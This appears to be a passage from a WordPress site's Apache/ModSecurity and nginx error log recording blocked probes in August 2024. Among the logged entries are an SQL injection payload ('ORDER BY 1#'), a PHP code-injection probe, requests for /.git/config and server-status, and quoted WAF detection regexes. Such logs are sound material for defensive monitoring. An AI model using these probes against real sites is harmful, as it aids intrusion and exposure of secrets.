"Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UHxeJlWfH1pdny5X1QAAAMI"] [Thu Aug 15 03:24:48.621058 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57450] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UHxeJlWfH1pdny5X1gAAAM0"] [Thu Aug 15 03:24:49.048372 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:57452] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UXxeJlWfH1pdny5X1wAAAMc"] [Thu Aug 15 03:24:49.537066 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:57454] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UXxeJlWfH1pdny5X2AAAANM"] [Thu Aug 15 03:24:50.013566 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:57456] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UnxeJlWfH1pdny5X2QAAAMo"] [Thu Aug 15 03:24:50.468422 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:57458] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UnxeJlWfH1pdny5X2gAAAMs"] [Thu Aug 15 03:24:50.978004 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:57460] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27UnxeJlWfH1pdny5X2wAAAM4"] [Thu Aug 15 03:24:51.409484 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:57464] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27U3xeJlWfH1pdny5X3QAAAMA"] [Thu Aug 15 03:24:51.842416 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57466] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27U3xeJlWfH1pdny5X3gAAAMU"] [Thu Aug 15 03:24:52.342865 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57468] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VHxeJlWfH1pdny5X3wAAAMg"] [Thu Aug 15 03:24:52.745034 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:57470] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VHxeJlWfH1pdny5X4AAAANg"] [Thu Aug 15 03:24:53.121645 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:57476] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VXxeJlWfH1pdny5X4QAAAMY"] [Thu Aug 15 03:24:53.636723 2024] [:error] [pid 31336:tid 139654024500992] [client 141.98.81.52:57478] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VUPAyXqJhbW53WyPcwAAAEU"] [Thu Aug 15 03:24:53.994832 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:57480] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VXxeJlWfH1pdny5X4gAAAMk"] [Thu Aug 15 03:24:54.399343 2024] [:error] [pid 31335:tid 139653873100544] [client 141.98.81.52:57482] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Vm0MD5oChETZltkVdQAAAA8"] [Thu Aug 15 03:24:54.814155 2024] [:error] [pid 31336:tid 139654049679104] [client 141.98.81.52:57484] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27VkPAyXqJhbW53WyPdAAAAEI"] 2024/08/15 17:44:37 [error] 23396#23396: *503095 access forbidden by rule, client: 52.47.201.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 16 02:33:55.260945 2024] [autoindex:error] [pid 23437:tid 140017485711104] [client 4.213.141.139:49510] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 16 08:01:09.546400 2024] [authz_core:error] [pid 29534:tid 139643831949056] [client 46.101.111.185:53276] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/16 08:01:14 [error] 28847#28847: *511074 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 16 09:59:22.533914 2024] [authz_core:error] [pid 28891:tid 139643722843904] [client 139.162.155.225:55184] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/16 09:59:27 [error] 28846#28846: *512091 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 16 12:21:29.921929 2024] [authz_core:error] [pid 28890:tid 139643815163648] [client 139.59.143.102:57332] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/16 12:21:35 [error] 28846#28846: *513119 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 16 13:22:20.624428 2024] [:error] [pid 28890:tid 139643865519872] [client 89.248.174.11:58098] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); ?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Zr-Y3A5lI48nbiCCyv01UwAAAEc"] [Fri Aug 16 23:38:16.155736 2024] [autoindex:error] [pid 28891:tid 139643840341760] [client 143.198.203.58:38322] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-site/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:16.628446 2024] [autoindex:error] [pid 28889:tid 139643789985536] [client 143.198.203.58:38324] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:16.866881 2024] [autoindex:error] [pid 28889:tid 139643840341760] [client 143.198.203.58:38326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:17.104753 2024] [autoindex:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:38328] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:20.016830 2024] [autoindex:error] [pid 29534:tid 139643798378240] [client 143.198.203.58:38338] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:20.254922 2024] [autoindex:error] [pid 29534:tid 139643882305280] [client 143.198.203.58:38342] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:20.494016 2024] [autoindex:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:38344] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:20.732415 2024] [autoindex:error] [pid 28891:tid 139643764807424] [client 143.198.203.58:38346] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:23.613387 2024] [autoindex:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:38358] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:23.859636 2024] [autoindex:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:38360] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:24.105035 2024] [autoindex:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:38362] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:24.351239 2024] [autoindex:error] [pid 28891:tid 139643789985536] [client 143.198.203.58:38364] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:24.597895 2024] [autoindex:error] [pid 28890:tid 139643798378240] [client 143.198.203.58:38366] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:24.843055 2024] [autoindex:error] [pid 28890:tid 139643748022016] [client 143.198.203.58:38370] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:25.925040 2024] [autoindex:error] [pid 28889:tid 139643798378240] [client 143.198.203.58:38376] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:38:26.167274 2024] [autoindex:error] [pid 28890:tid 139643985258240] [client 143.198.203.58:38380] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:03.735436 2024] [:error] [pid 29534:tid 139643722843904] [client 143.198.203.58:38492] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Aug 16 23:39:08.195295 2024] [:error] [pid 28890:tid 139643985258240] [client 143.198.203.58:38506] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Aug 16 23:39:14.458366 2024] [autoindex:error] [pid 29534:tid 139643976865536] [client 143.198.203.58:38526] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/08/16 23:39:16 [error] 28847#28847: *517956 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 143.198.203.58, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/08/16 23:39:16 [error] 28847#28847: *517956 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 143.198.203.58, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Fri Aug 16 23:39:31.385750 2024] [autoindex:error] [pid 28890:tid 139643831949056] [client 143.198.203.58:38584] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:34.303847 2024] [autoindex:error] [pid 28891:tid 139643798378240] [client 143.198.203.58:38596] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:37.541886 2024] [autoindex:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:38606] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:51.338729 2024] [autoindex:error] [pid 28889:tid 139643960080128] [client 143.198.203.58:38640] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:52.880509 2024] [autoindex:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:38650] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:53.117437 2024] [autoindex:error] [pid 29534:tid 139643789985536] [client 143.198.203.58:38652] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex 